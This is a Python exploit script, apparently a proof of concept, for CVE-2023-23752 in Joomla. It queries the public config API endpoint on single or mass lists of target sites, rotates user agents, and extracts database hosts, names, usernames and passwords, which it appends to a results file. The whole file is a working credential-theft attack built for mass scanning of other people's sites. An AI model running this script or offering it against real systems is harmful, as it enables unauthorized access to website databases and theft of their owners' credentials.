import aiohttp import asyncio import os , time import re import colorama import urllib3 from colorama import Fore, init from fake_useragent import UserAgent init(autoreset=True) delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if not os.path.exists('Results'): os.mkdir('Results') MAX_REQUESTS_PER_SECOND = 2 LAST_REQUEST_TIME = 0 user_agent_rotator = UserAgent() def Banner(): print(Fore.LIGHTCYAN_EX+r" ___ _ _ ___ ___ ___ ___ ____ ___ ____ ___ ___ ___ ") print(Fore.LIGHTCYAN_EX+r"| _]| | || __] [_ ]| |[_ ][__ / ___ [_ ][__ /|_ || __|[_ ]") print(Fore.LIGHTCYAN_EX+r"| [__| | || _] / / | / | / / [_ \ |___| / / [_ \ / / `__ \ / / ") print(Fore.LIGHTCYAN_EX+r"\___/|__/ |___] [___] \__|[___][___/ [___][___//_/ |___/[___]") print(Fore.GREEN+"Github"+Fore.LIGHTWHITE_EX+" https://github.com/Pushkarup ") print(Fore.GREEN+"LinkedIn"+Fore.LIGHTWHITE_EX+" https://www.linkedin.com/in/pushkar-upadhyay ") print(f"{Fore.YELLOW}[PoC By PUSHKAR UPADHYAY] - {Fore.GREEN}JOOMLA DATABASE FETCH") async def fetch(session, url): global LAST_REQUEST_TIME current_time = time.time() elapsed_time_since_last_request = current_time - LAST_REQUEST_TIME if elapsed_time_since_last_request < 1 / MAX_REQUESTS_PER_SECOND: await asyncio.sleep(1 / MAX_REQUESTS_PER_SECOND - elapsed_time_since_last_request) LAST_REQUEST_TIME = time.time() headers = { "Host": url, "content-type": "application/vnd.api+json", "User-Agent": user_agent_rotator.random, } async with session.get(url, headers=headers, verify_ssl=True, timeout=10) as response: return await response.text(), response.status async def scan_single_url(session, url): print(f"\n{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.GREEN}[Scanning!]") config_url = url + '/api/index.php/v1/config/application?public=true' content, status = await fetch(session, config_url) if status == 200 and b'dbtype' in content.encode(): decoded_content = content dbtype = re.findall('"dbtype":"(.*?)"', decoded_content)[0] dbprefix = re.findall('"dbprefix":"(.*?)"', decoded_content)[0] host = re.findall('"host":"(.*?)"', decoded_content)[0] db = re.findall('"db":"(.*?)"', decoded_content)[0] user = re.findall('"user":"(.*?)"', decoded_content)[0] password = re.findall('"password":"(.*?)"', decoded_content)[0] print(f"{Fore.YELLOW}\n[+] Domain : {Fore.GREEN}{url}") print(f"{Fore.YELLOW}[+] Database Type : {Fore.GREEN}{dbtype}") print(f"{Fore.YELLOW}[+] Database Prefix : {Fore.GREEN}{dbprefix}") print(f"{Fore.YELLOW}[+] Database : {Fore.GREEN}{db}") print(f"{Fore.YELLOW}[+] Hostname : {Fore.GREEN}{host}") print(f"{Fore.YELLOW}[+] Username : {Fore.GREEN}{user}") print(f"{Fore.YELLOW}[+] Password : {Fore.GREEN}{password}\n") with open('Results/Configurations.txt', 'a') as f: f.write(f"[+] {url}\nDatabase Type : {dbtype}\nDatabase Prefix : {dbprefix}\nHostname : {host}\nDatabase : {db}\nUsername : {user}\nPassword : {password}\n\n") return decoded_content, True else: print(f"{Fore.YELLOW}[CVE-2023-23752]{Fore.RED} - {Fore.WHITE}{url}{Fore.RED} .: {Fore.RED}[No Sensitive Information!]") return '', False async def scan_multiple_urls(filename): tasks = [] async with aiohttp.ClientSession() as session: with open(filename, 'r') as file: urls = [line.strip() for line in file if line.strip()] for url in urls: tasks.append(scan_single_url(session, url)) return await asyncio.gather(*tasks) def result_summarization(results): successful_scans = sum(1 for _, success in results if success) failed_scans = len(results) - successful_scans error_count = sum(1 for _, success in results if not success) print("\n======== Scan Summary ========") print(f"Successful Scans: {successful_scans}") print(f"Failed Scans: {failed_scans}") print(f"Errors Encountered: {error_count}") if __name__ == '__main__': try: filename = input(f"\n{Fore.YELLOW}Enter the filename containing URLs: {Fore.RESET}") if not os.path.isfile(filename): print(f"{Fore.RED}Error: The specified file does not exist.") exit() choice = input(f"\n{Fore.RED}[1] - {Fore.YELLOW}Single Scan\n{Fore.RED}[2] - {Fore.YELLOW}Massive Scan\n\n{Fore.YELLOW}[CVE-2023-23752]: {Fore.WHITE}") if choice == '1': url = input(f"\n{Fore.YELLOW}Enter a single IP/Domain: {Fore.RESET}") asyncio.run(scan_single_url(url)) elif choice == '2': results = asyncio.run(scan_multiple_urls(filename)) result_summarization(results) else: print(f"\n{Fore.RED}Invalid option selected") except KeyboardInterrupt: print(f"\n{Fore.RED}Scan interrupted by user.") except Exception as e: print(f"{Fore.RED}An unexpected error occurred: {str(e)}")